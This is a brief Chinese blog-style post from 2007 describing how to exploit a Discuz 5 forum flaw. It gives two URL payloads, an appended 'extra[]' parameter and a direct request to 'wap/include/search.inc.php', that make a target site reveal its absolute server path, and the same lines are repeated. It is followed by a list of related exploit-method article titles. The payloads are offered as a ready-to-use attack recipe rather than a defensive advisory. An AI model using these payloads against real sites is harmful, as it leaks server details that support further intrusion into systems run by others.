DIscuz5暴路径漏洞利用方法
2007-05-21 13:28
225 查看
漏洞描述:DISCUZ5 暴库漏洞
在url后+&extra%5B%5D=page%3D1#pid1453,即可以暴出目标地址的绝对路径
另外一个:
在url后加wap/include/search.inc.php 也可以暴库!
在url后+&extra%5B%5D=page%3D1#pid1453,即可以暴出目标地址的绝对路径
另外一个:
在url后加wap/include/search.inc.php 也可以暴库!
相关文章推荐
- 利用SQL漏洞强行登录及防范方法
- 利用bat读取文件夹下所有目录路径并打上标签的方法图文详细教程
- 利用bat读取文件夹下所有目录路径并打上标签的方法图文详细教程
- MiniWeb0.8.19的最新漏洞分析及利用方法!
- Discuz!uc.key泄露导致代码注入漏洞uc.php的解决方法
- Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战
- 百度文库免积分下载原格式文档的方法(利用百度文库漏洞)
- vbscript LoadPicture函数使用方法与漏洞利用
- discuz xss 0day利用方法
- DZ(discuz) x2.5 爆路径漏洞
- PHP利用正则表达式将相对路径转成绝对路径的方法示例
- 利用servlet规范,一种实现动态路径的方法
- 从一个漏洞谈到ptrace的漏洞发现及利用方法
- [转载20131024]Nginx服务器漏洞的利用和修复方法
- 利用SQL注入漏洞登录后台的实现方法
- Fckeditor jsp版漏洞利用方法:
- 利用bat读取文件夹下所有目录路径并打上标签的方法图文详细教程
- Fckeditor漏洞利用方法总结
- 利用腾讯漏洞,QQ群日拉万人精准流量的方法
- PHPWIND & DISCUZ! CSRF漏洞利用测试分析